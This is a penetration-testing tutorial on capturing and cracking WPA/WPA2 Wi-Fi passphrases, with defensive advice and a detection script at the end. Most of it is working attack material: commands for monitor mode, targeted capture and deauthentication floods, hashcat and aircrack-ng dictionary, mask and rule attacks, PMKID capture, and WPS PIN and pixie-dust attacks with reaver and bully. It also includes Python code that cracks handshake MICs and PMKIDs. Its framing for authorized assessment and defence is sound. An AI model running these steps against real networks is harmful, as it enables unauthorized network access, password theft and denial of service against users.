How to Capture & Crack WPA/WPA2 Wireless Passwords
Learn professional wireless security assessment techniques for capturing and analyzing WPA/WPA2 handshakes, including modern GPU-accelerated cracking methods.
Introduction to Wireless Security Testing
Wireless network security assessment is a critical component of comprehensive penetration testing. WPA/WPA2 protocols, while significantly more secure than their predecessors, still contain vulnerabilities that can be exploited under certain conditions.
This tutorial provides a comprehensive guide to professional wireless security testing, covering the complete process from reconnaissance to password recovery using industry-standard tools and methodologies.
Legal and Ethical Framework
CRITICAL LEGAL WARNING
- • Only test wireless networks you own or have explicit written permission to test
- • Unauthorized wireless network access is illegal in most jurisdictions
- • Penalties can include significant fines and imprisonment
- • Always obtain proper authorization before beginning any wireless security testing
- • Document all authorized testing activities thoroughly
Wireless security testing should only be performed as part of authorized penetration testing engagements or on networks you own. This tutorial is designed for security professionals, researchers, and students learning about wireless security in controlled environments.
Wireless Security Fundamentals
WPA/WPA2 Protocol Overview
Wi-Fi Protected Access (WPA) and WPA2 replaced the vulnerable WEP protocol with stronger encryption and authentication mechanisms:
- WPA: Uses TKIP encryption with RC4 cipher
- WPA2: Uses CCMP encryption with AES cipher (more secure)
- PSK (Pre-Shared Key): Personal mode using shared passwords
- Enterprise: Uses RADIUS authentication (802.1X)
Four-Way Handshake Process
The WPA/WPA2 four-way handshake establishes encryption keys between client and access point:
Four-Way Handshake Process:
1. AP → Client: ANonce (AP Nonce) - the access point sends a random nonce to the client
2. Client → AP: SNonce + MIC - the client sends its own nonce; the MIC is computed with the KCK portion of the PTK, so both sides already hold the PTK at this point
3. AP → Client: GTK (Group Temporal Key, encrypted with the KEK) + MIC - the access point delivers the group key and proves it knows the PTK
4. Client → AP: Confirmation + MIC - the client confirms that the keys are installed

Key Derivation:
PMK (Pairwise Master Key) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
PTK (Pairwise Transient Key) = PRF-384(PMK, "Pairwise key expansion", min(AP MAC, client MAC) || max(AP MAC, client MAC) || min(ANonce, SNonce) || max(ANonce, SNonce)) (PRF-512 for TKIP)
KCK = PTK[0:16] (authenticates the EAPOL messages), KEK = PTK[16:32] (wraps the GTK), TK = PTK[32:48] (encrypts data frames)

What an offline attack needs: the passphrase itself never crosses the air. An attacker who captures ANonce, SNonce, both MAC addresses, the SSID and one MIC (from message 2, 3 or 4) can recompute PMK → PTK → MIC for every candidate passphrase and compare; the 4096-iteration PBKDF2 is what makes each guess expensive, and it is the only thing that makes a weak passphrase slow to recover.
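The derivation chain above, carried through in code as an added example (not part of the original tutorial): PBKDF2 to PMK, the 802.11 PRF to PTK, the KCK to the message 2 MIC, and a loop that tests candidate passphrases the way aircrack-ng and hashcat do. The handshake is constructed here (the MAC addresses, nonces, RSN IE and the passphrase "password" are assumptions, not a real capture); the PMK known-answer value for passphrase "password" and SSID "IEEE" is the IEEE 802.11 test vector.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # IEEE 802.11 PRF-X: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Both sides sort the MACs and nonces by value, so they derive the same PTK regardless of role
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)  # 384 bits for CCMP: KCK | KEK | TK


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL frame, truncated to 128 bits
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


MIC_OFFSET = 4 + 77  # 802.1X header (4 bytes) + offset of the Key MIC field inside the EAPOL-Key body


def build_eapol_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with the MIC field zeroed (the form the MIC is computed over)."""
    body = (b"\x02"                         # descriptor type: RSN
            + b"\x01\x0a"                   # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
            + b"\x00\x10"                   # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")        # replay counter
            + snonce                        # 32-byte SNonce
            + b"\x00" * 16                  # key IV
            + b"\x00" * 8                   # key RSC
            + b"\x00" * 8                   # reserved
            + b"\x00" * 16                  # key MIC (zero while computing)
            + len(key_data).to_bytes(2, "big")
            + key_data)                     # key data: the client's RSN IE
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Return the passphrase in wordlist that reproduces the MIC carried in eapol, or None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)  # the expensive step: 4096 PBKDF2 rounds
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# Constructed sample handshake (not a real capture); the "target" network's passphrase is "password".
SSID = "IEEE"
AP_MAC = bytes.fromhex("a0a1a1a3a4a5")
STA_MAC = bytes.fromhex("b0b1b2b3b4b5")
ANONCE = bytes(range(0xE0, 0x100))   # 32 bytes
SNONCE = bytes(range(0xC0, 0xE0))    # 32 bytes
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP group/pairwise, PSK AKM


def sample_msg2() -> bytes:
    """Message 2 as the client would transmit it: MIC filled in using the real passphrase."""
    frame = build_eapol_msg2(SNONCE, RSN_IE)
    kck = ptk_from_pmk(pmk_from_passphrase("password", SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def demo(wordlist=("letmein", "wifi2024", "password", "qwertyuiop")):
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, sample_msg2(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The loop shows why the tools spend almost all their time in PBKDF2: per candidate there are 8192 HMAC-SHA1 calls for the PMK and only four more for the PTK and MIC, and nothing about the PTK can be cached across candidates because it depends on the PMK.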
Vulnerability Analysis
WPA/WPA2 vulnerabilities primarily stem from weak passwords and implementation flaws:
- Weak passwords: Short or common passwords vulnerable to dictionary attacks
- Handshake capture: Four-way handshake can be captured and analyzed offline
- PMKID attacks: Newer attack method requiring only one frame
- WPS vulnerabilities: PIN-based authentication weaknesses
Tools and Environment Setup
Hardware Requirements
Proper hardware is essential for effective wireless security testing:
- USB Wireless Adapter: Must support monitor mode and packet injection
- Recommended Chipsets: Atheros AR9271 and Ralink RT3070 (supported by in-kernel drivers), Realtek RTL8812AU (needs the out-of-tree aircrack-ng rtl8812au driver)
- Popular Models: Alfa AWUS036ACS, TP-Link AC600, Panda PAU09
- External Antenna: Optional but recommended for better range and reception
Hardware Tip: Check the adapter before you start. iw list shows the supported interface modes (look for "monitor"), sudo airmon-ng lists the driver and chipset it detected, and sudo aireplay-ng --test wlan0mon confirms that packet injection works once monitor mode is up. Not all adapters support monitor mode and injection. iwconfig still works on most distributions but belongs to the deprecated wireless-tools package; iw is its replacement.
Software Installation
Install the necessary tools for wireless security testing:
```bash
# Kali Linux (most of these are pre-installed)
sudo apt update
sudo apt install aircrack-ng hashcat hcxtools hcxdumptool

# Ubuntu/Debian
sudo apt update
sudo apt install aircrack-ng hashcat hcxtools hcxdumptool reaver pixiewps

# Additional tools
sudo apt install wireshark tshark macchanger

# GPU support for hashcat: NVIDIA needs the proprietary driver plus CUDA (Ubuntu example below;
# use the driver version your distribution ships). AMD needs ROCm/OpenCL from AMD's own packages,
# there is no apt package for it. Verify afterwards with: hashcat -I
sudo apt install nvidia-driver-460 nvidia-cuda-toolkit
```
Wireless Adapter Configuration
```bash
# Check wireless interfaces
iwconfig

# List adapters, drivers and chipsets (also warns about interfering processes)
sudo airmon-ng

# Kill interfering processes (this stops NetworkManager/wpa_supplicant, so normal Wi-Fi is gone until they are restarted)
sudo airmon-ng check kill

# Enable monitor mode (creates wlan0mon on most drivers)
sudo airmon-ng start wlan0

# Verify monitor mode
iwconfig

# Optional: change the MAC address of the monitor interface
sudo ip link set wlan0mon down
sudo macchanger -r wlan0mon
sudo ip link set wlan0mon up
```
When testing is finished, run sudo airmon-ng stop wlan0mon and restart NetworkManager to restore normal connectivity.
Wireless Network Reconnaissance
Network Discovery and Analysis
Begin by discovering and analyzing available wireless networks:
```bash
# Basic network discovery (hops across the 2.4 GHz channels by default)
sudo airodump-ng wlan0mon

# Lock to one channel for better reception
sudo airodump-ng wlan0mon -c 6

# Save discovery results to file (writes discovery_scan-01.cap, .csv, ...)
sudo airodump-ng wlan0mon -w discovery_scan

# Show only WPA/WPA2 networks
sudo airodump-ng wlan0mon --encrypt WPA

# WPS detection with wash
sudo wash -i wlan0mon
```
Target Selection Criteria
Consider these factors when selecting targets for authorized testing:
- Signal Strength: Strong signal improves capture reliability
- Connected Clients: Active clients enable handshake capture
- WPS Enabled: Additional attack vectors available
- Encryption Type: The techniques in this tutorial apply to WPA/WPA2-PSK. WPA3-SAE does not expose an offline-crackable handshake, and a WPA2 network with Protected Management Frames (802.11w) ignores forged deauthentication frames, so only passive capture works there
- Authorization: ONLY test networks you own or have permission to test
Target-Locked Capture Setup
```bash
# Capture only the target BSSID on its channel (writes capture-01.cap)
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture

# Same, ignoring the "fixed channel -1" error some drivers report
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture --ignore-negative-one

# Write only a pcap file instead of the default cap/csv/kismet set
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture --output-format pcap
```
WPA/WPA2 Handshake Capture
Passive Handshake Capture
Passive capture involves waiting for natural client connections:
```bash
# Start passive capture
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake

# Wait for the "WPA handshake" message at the right of the status line.
# It appears when a client connects or reconnects, e.g.:
# [ CH 6 ][ Elapsed: 0 s ][ 2024-11-14 14:30:15 ][ WPA handshake: AA:BB:CC:DD:EE:FF
# The capture is saved as handshake-01.cap
```
Active Handshake Capture (Deauthentication)
Active capture forces clients to reconnect by sending deauthentication frames:
```bash
# Terminal 1: keep capturing on the target channel
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake

# Terminal 2: deauthenticate all clients (broadcast)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauthenticate a specific client (more reliable than broadcast)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# Gentle deauth (fewer bursts)
sudo aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF wlan0mon

# Continuous deauth until interrupted (be careful!)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
```
Caution: Deauthentication attacks cause a denial of service for as long as they run. Send the fewest frames that work, target a single client where possible, and only do this on authorized networks during approved testing windows. Forged deauthentication frames are ignored by clients and APs that negotiated Protected Management Frames (802.11w), which WPA3 requires and WPA2 can enable; against such a network you are limited to passive capture.
Handshake Verification
```bash
# List the networks in the capture and how many handshakes were found for each
sudo aircrack-ng handshake-01.cap

# Check that the handshake is usable by running a wordlist against it
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Alternative verification with cowpatty (-c checks for a complete handshake without cracking)
cowpatty -c -r handshake-01.cap

# Convert to hashcat's hccapx format with aircrack-ng (-j)
sudo aircrack-ng handshake-01.cap -j hashcat_file

# Or use cap2hccapx from hashcat-utils
cap2hccapx handshake-01.cap handshake.hccapx
```
A usable capture does not need all four messages: both nonces, one MIC and the SSID (from a beacon or probe response in the same file) are enough, which is why messages 1 and 2, or 2 and 3, are sufficient.
Password Cracking Techniques
Dictionary and Wordlist Attacks
Dictionary attacks test common passwords against the captured handshake:
```bash
# Basic dictionary attack with aircrack-ng
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Specify the target BSSID when the capture holds several networks
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap

# Use multiple wordlists (comma-separated)
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/wordlists/fasttrack.txt handshake-01.cap

# Generate a custom wordlist with crunch. Mind the size: every 8-12 character string over this
# 62-character set is far beyond what any disk holds (62^8 alone is about 2.2e14 lines), so in
# practice use crunch for constrained patterns (-t) or pipe it straight into the cracker.
crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 > custom.txt

# Use John the Ripper to expand a wordlist with its rules
john --wordlist=/usr/share/wordlists/rockyou.txt --rules --stdout > expanded.txt
```
Rule-Based Attacks
Rule-based attacks apply transformations to dictionary words:
```bash
# Common password transformations
# password -> password123, Password, password!, etc.

# John the Ripper rules
john --wordlist=base_passwords.txt --rules=All --stdout > transformed.txt

# Hashcat rules (more on this in the GPU section). Functions in a rule are applied left to right:
# $1$2$3    append 123
# c         capitalize the first letter, lowercase the rest
# u         uppercase all
# $!        append !
# ^4^2^0^2  prepend 2024 (each ^ prepends one character, so the digits are written in reverse;
#           ^2^0^2^4 would produce 4202password)
```
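To make the left-to-right semantics concrete, here is a small interpreter for a subset of hashcat's rule language, written for this page as an added example (it is not hashcat's engine, which supports many more functions and runs them on the GPU). It reproduces the prepend subtlety above and can be used to preview what a rule file will do to a wordlist before spending GPU time on it.

```python
def apply_rule(rule: str, word: str) -> str:
    """Apply one hashcat-style rule to a word, left to right.

    Supported functions: ':' 'l' 'u' 'c' 'C' 't' 'r' 'd' 'f' '$X' '^X' '[' ']' and spaces.
    """
    i = 0
    while i < len(rule):
        op = rule[i]
        if op in (":", " "):       # no-op / separator
            pass
        elif op == "l":            # lowercase all
            word = word.lower()
        elif op == "u":            # uppercase all
            word = word.upper()
        elif op == "c":            # capitalize first, lowercase rest
            word = word[:1].upper() + word[1:].lower()
        elif op == "C":            # lowercase first, uppercase rest
            word = word[:1].lower() + word[1:].upper()
        elif op == "t":            # toggle case
            word = word.swapcase()
        elif op == "r":            # reverse
            word = word[::-1]
        elif op == "d":            # duplicate
            word = word * 2
        elif op == "f":            # reflect: append the reversed word
            word = word + word[::-1]
        elif op == "$":            # append the next character
            i += 1
            word = word + rule[i]
        elif op == "^":            # prepend the next character (this is why ^2^0^2^4 yields 4202...)
            i += 1
            word = rule[i] + word
        elif op == "[":            # delete first character
            word = word[1:]
        elif op == "]":            # delete last character
            word = word[:-1]
        else:
            raise ValueError(f"unsupported rule function {op!r} in rule {rule!r}")
        i += 1
    return word


def expand(words, rules):
    """Yield every candidate a rule file would produce; duplicates are kept, as hashcat keeps them."""
    for rule in rules:
        for w in words:
            yield apply_rule(rule, w)


if __name__ == "__main__":
    for rule in ("^2^0^2^4", "^4^2^0^2", "c$1$2$3", "u$!", "l$2$0$2$4", "]d"):
        print(f"{rule:10} password -> {apply_rule(rule, 'password')}")
```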
Brute Force Attacks
```bash
# Generate every 8-character string over lowercase+digits and feed it straight to aircrack-ng.
# Keyspace: 36^8 = 2.8e12 candidates; at a few thousand keys per second on a CPU this takes decades,
# so exhaustive brute force is only realistic with a GPU (see below) and a tightly constrained mask.
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 | aircrack-ng -w - handshake-01.cap

# Brute force with a fixed prefix: the min/max length must equal the pattern length (11 here)
crunch 11 11 -t password%%% > brute.txt
sudo aircrack-ng -w brute.txt handshake-01.cap

# Brute force purely numeric 8-digit passwords (10^8 candidates, a few hours on a CPU)
crunch 8 8 0123456789 | aircrack-ng -w - handshake-01.cap
```
GPU-Accelerated Cracking
Hashcat Configuration
Hashcat provides significantly faster password cracking using GPU acceleration:
```bash
# Convert the capture to hashcat's current 22000 format (handles both handshakes and PMKIDs)
hcxpcapngtool -o handshake.hc22000 handshake-01.cap

# Legacy hccapx conversion (mode 2500, deprecated since hashcat 6.0)
cap2hccapx handshake-01.cap handshake.hccapx
aircrack-ng handshake-01.cap -j hashcat_output

# Check GPU devices
hashcat -I

# Dictionary attack, 22000 format (WPA/WPA2-PSK only; WPA3-SAE cannot be cracked this way)
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt

# Same attack against the legacy hccapx file
hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt
```
Performance Optimization
```bash
# Rule-based attack with hashcat
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Combination attack (every word of list1 joined with every word of list2)
hashcat -m 22000 handshake.hc22000 -a 1 list1.txt list2.txt

# Mask attack (brute force with a pattern)
# ?l = lowercase, ?u = uppercase, ?d = digit, ?s = symbol
# Keyspace of this mask: 26 * 26^5 * 10^3 = 3.1e11 candidates
hashcat -m 22000 handshake.hc22000 -a 3 ?u?l?l?l?l?l?d?d?d

# Hybrid attack (wordlist + mask)
hashcat -m 22000 handshake.hc22000 -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d

# Performance tuning: -w 3 drives the GPU harder (the desktop becomes unresponsive).
# --force is not a performance flag; it only silences driver and sanity warnings and can hide wrong results.
hashcat -m 22000 handshake.hc22000 wordlist.txt -w 3

# Resume an interrupted session
hashcat --restore
```
Advanced Attack Techniques
PMKID Attacks
PMKID attacks need only the first message of the handshake, which the AP sends to any station that starts to associate, so no connected client and no deauthentication is required. They work only against APs that include a PMKID in that message (PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC)); many current firmwares no longer do, in which case hcxdumptool falls back to collecting ordinary handshakes.
```bash
# Install hcxtools and hcxdumptool
sudo apt install hcxtools hcxdumptool

# Capture PMKIDs (hcxdumptool 6.2 syntax; 6.3 and later renamed most options, e.g. output is -w, so check --help)
sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --enable_status=1

# Convert to hashcat 22000 format and write the list of ESSIDs seen alongside it
hcxpcapngtool -o pmkid.hc22000 -E essidlist pmkid.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

# Attack only the APs listed in a file (--filtermode=2 = listed addresses only; option names differ between versions)
sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --filterlist_ap=target_macs.txt --filtermode=2
```
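The PMKID computation and the hashcat 22000 line format, as an added example written for this page (not code from hcxtools or hashcat). It parses a `WPA*01*...` PMKID line of the kind hcxpcapngtool emits, recomputes the PMKID for each candidate passphrase and reports a match; the sample line is constructed from assumed MAC addresses, the SSID "IEEE" and the passphrase "password" rather than taken from a capture.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # Same PBKDF2 step as for the four-way handshake: this is where the cost per guess lives
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): no nonces and no client traffic involved
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_hc22000_pmkid(line: str) -> dict:
    """Parse a hashcat 22000 PMKID line: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a 22000 PMKID line (type 02 lines carry EAPOL handshakes instead)")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]).decode(),
    }


def crack_pmkid_line(line: str, wordlist):
    """Return the passphrase from wordlist whose PMKID matches the captured one, or None."""
    h = parse_hc22000_pmkid(line)
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, h["essid"])
        if hmac.compare_digest(pmkid(pmk, h["ap_mac"], h["sta_mac"]), h["pmkid"]):
            return candidate
    return None


def make_hc22000_pmkid_line(passphrase: str, essid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Constructed: the line hcxpcapngtool would emit for an AP whose passphrase we already know."""
    value = pmkid(pmk_from_passphrase(passphrase, essid), ap_mac, sta_mac)
    fields = ["WPA", "01", value.hex(), ap_mac.hex(), sta_mac.hex(), essid.encode().hex(), "", "", ""]
    return "*".join(fields)   # trailing '***' = empty ANONCE, EAPOL and MESSAGEPAIR fields


# Constructed sample (assumed addresses, not a real capture)
SAMPLE_LINE = make_hc22000_pmkid_line(
    "password", "IEEE", bytes.fromhex("a0a1a1a3a4a5"), bytes.fromhex("b0b1b2b3b4b5")
)


def demo(wordlist=("letmein", "wifi2024", "password", "qwertyuiop")):
    return crack_pmkid_line(SAMPLE_LINE, wordlist)


if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered passphrase:", demo())
```

Because the PMKID depends only on the PMK and the two MAC addresses, the AP hands out everything needed for an offline attack in a single frame; the defence is the same as for handshake capture, a passphrase that is not in any wordlist.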
WPS Vulnerabilities
Wi-Fi Protected Setup (WPS) contains several known weaknesses. The 8-digit registrar PIN is verified in two halves, and its last digit is a checksum, so an online brute force needs at most 10^4 + 10^3 = 11,000 attempts instead of 10^7. Pixie dust goes further: on chipsets with weak nonce generation the PIN can be recovered offline from a single exchange. Most current APs lock WPS after a handful of failed PINs, so the online attack is often impractical even where WPS is enabled.
```bash
# Scan for WPS-enabled networks (the Lck column shows whether WPS is currently locked)
sudo wash -i wlan0mon

# Online WPS PIN attack with reaver (-S uses small DH keys to speed up each exchange)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -S

# Pixie dust attack (offline PIN recovery; only works on vulnerable chipsets)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K

# Slower PIN brute force for APs that rate-limit: ignore lock state (-L), skip NACKs (-N),
# 15 s between attempts (-d), 0.5 s M5/M7 timeout (-T), pause 15 s every 3 attempts (-r)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -r 3:15

# Bully (alternative to reaver); the interface is the final argument
sudo bully -b AA:BB:CC:DD:EE:FF -v 3 wlan0mon
```
Defense and Mitigation Strategies
Understanding defensive measures is crucial for implementing proper wireless security:
Network Configuration Best Practices
- Strong Passphrases: Use long random passphrases (12+ characters). Length and randomness matter more than character classes, because the only attack on a correctly implemented WPA2-PSK network is guessing
- WPA3 Adoption: Upgrade to WPA3 where supported; SAE does not expose an offline-crackable handshake
- Protected Management Frames: Enable 802.11w on WPA2 networks whose clients support it. It authenticates deauthentication and disassociation frames, which defeats the forced-reconnect technique shown above (WPA3 requires it)
- Disable WPS: Turn off WPS to eliminate PIN and pixie dust attacks
- MAC Address Filtering: Adds friction only; client MACs are visible in the air and trivially cloned with macchanger, so do not count it as a control
- SSID Hiding: Not a security control; the SSID still appears in probe and association frames, and clients configured for a hidden network probe for it wherever they go
- Regular Updates: Keep firmware updated on all devices
Enterprise Security Measures
- 802.1X Authentication: Use certificate-based authentication
- Network Segmentation: Isolate wireless networks from critical systems
- Monitoring Systems: Deploy wireless intrusion detection systems
- Guest Networks: Separate guest access from corporate networks
- Regular Auditing: Perform periodic wireless security assessments
Attack Detection and Prevention
Implementing detection mechanisms helps identify potential wireless attacks:
Detection Techniques
- Deauth Detection: Monitor for excessive deauthentication frames
- Rogue AP Detection: Identify unauthorized access points
- Client Monitoring: Track unusual client connection patterns
- Signal Analysis: Detect abnormal signal strength variations
- Log Analysis: Review authentication logs for failed attempts
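The first item of that list, deauth detection, as an added example written for this page (not code from any wireless IDS): a sliding-window counter over management frame records of the kind tshark exports with `-T fields -e frame.time_epoch -e wlan.sa -e wlan.da -e wlan.fc.type_subtype`. The sample lines are constructed (assumed addresses and timestamps, not a real capture): one client leaving and re-associating normally, then a burst of 64 broadcast deauthentication frames forged with the AP's own address, which is what an aireplay-ng run looks like on the air.

```python
from collections import defaultdict, deque

DEAUTH = 0x0C      # management frame subtype 12: deauthentication
DISASSOC = 0x0A    # management frame subtype 10: disassociation


def parse_tshark_line(line: str):
    """One tab-separated tshark line: time_epoch, source MAC, destination MAC, type/subtype."""
    ts, src, dst, subtype = line.rstrip("\n").split("\t")
    return float(ts), src.lower(), dst.lower(), int(subtype, 0)   # int(x, 0) accepts "0x000c" or "12"


def detect_deauth_floods(frames, window_s=5.0, threshold=10):
    """frames: iterable of (ts, src, dst, subtype). Returns {src: timestamp of first alert}.

    A legitimate AP or client sends a few deauth/disassoc frames around roaming or shutdown; a
    forged flood (aireplay-ng sends them in bursts of 64) exceeds any sane per-source rate within
    seconds. Forged frames carry the AP's address as source, so the alert names the BSSID being
    spoofed, not the attacker's hardware; correlating sequence numbers or signal strength with the
    real AP's frames is the next step in an investigation.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, src, dst, subtype in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window_s:   # drop frames that fell out of the sliding window
            q.popleft()
        if len(q) > threshold and src not in alerts:
            alerts[src] = ts
    return alerts


AP = "aa:bb:cc:dd:ee:ff"
CLIENT = "11:22:33:44:55:66"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed tshark-style output (not a real capture)
SAMPLE_LINES = [
    f"1700000000.000\t{CLIENT}\t{AP}\t0x000c",   # client deauthenticates itself when leaving
    f"1700000001.000\t{CLIENT}\t{AP}\t0x0000",   # association request when it comes back
] + [f"{1700000010 + i * 0.01:.3f}\t{AP}\t{BROADCAST}\t0x000c" for i in range(64)]


def demo(window_s=5.0, threshold=10):
    return detect_deauth_floods((parse_tshark_line(l) for l in SAMPLE_LINES), window_s, threshold)


if __name__ == "__main__":
    for src, ts in demo().items():
        print(f"deauth flood with source {src} starting at {ts:.2f}")
```

In production the same logic would read a live tshark pipe or a Kismet alert feed rather than a list; the window and threshold are the knobs to tune against your own APs' normal behaviour (controllers that kick idle clients can legitimately exceed a low threshold).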
```bash
# Example: monitoring for deauth attacks
# Record frames on the channel of your own AP (airodump-ng's CSV output only summarises
# networks and clients; frame-level analysis needs the pcap)
sudo airodump-ng wlan0mon -c 6 --output-format pcap -w monitoring

# Count deauthentication frames (subtype 0x0c) per source address; a legitimate AP sends
# a handful, a flood from aireplay-ng shows up as hundreds within seconds
tshark -r monitoring-01.cap -Y "wlan.fc.type_subtype == 0x000c" -T fields -e wlan.sa | sort | uniq -c | sort -rn

# Set up kismet for comprehensive monitoring (it raises its own deauth-flood alerts)
sudo kismet -c wlan0mon
```

Conclusion
Wireless security testing is an essential component of comprehensive penetration testing. While WPA/WPA2 protocols provide significantly better security than their predecessors, they remain vulnerable to attacks when weak passwords are used or when implementation flaws exist.
The techniques covered in this tutorial represent real-world attack vectors that security professionals must understand to properly assess and defend wireless networks. As wireless technology continues to evolve with WPA3 and other security enhancements, staying current with both attack and defense techniques remains crucial.
Ethical Practice: Remember that the goal of wireless security testing is to improve overall security posture. Always operate within legal boundaries, maintain detailed documentation, and provide actionable remediation guidance in your reports.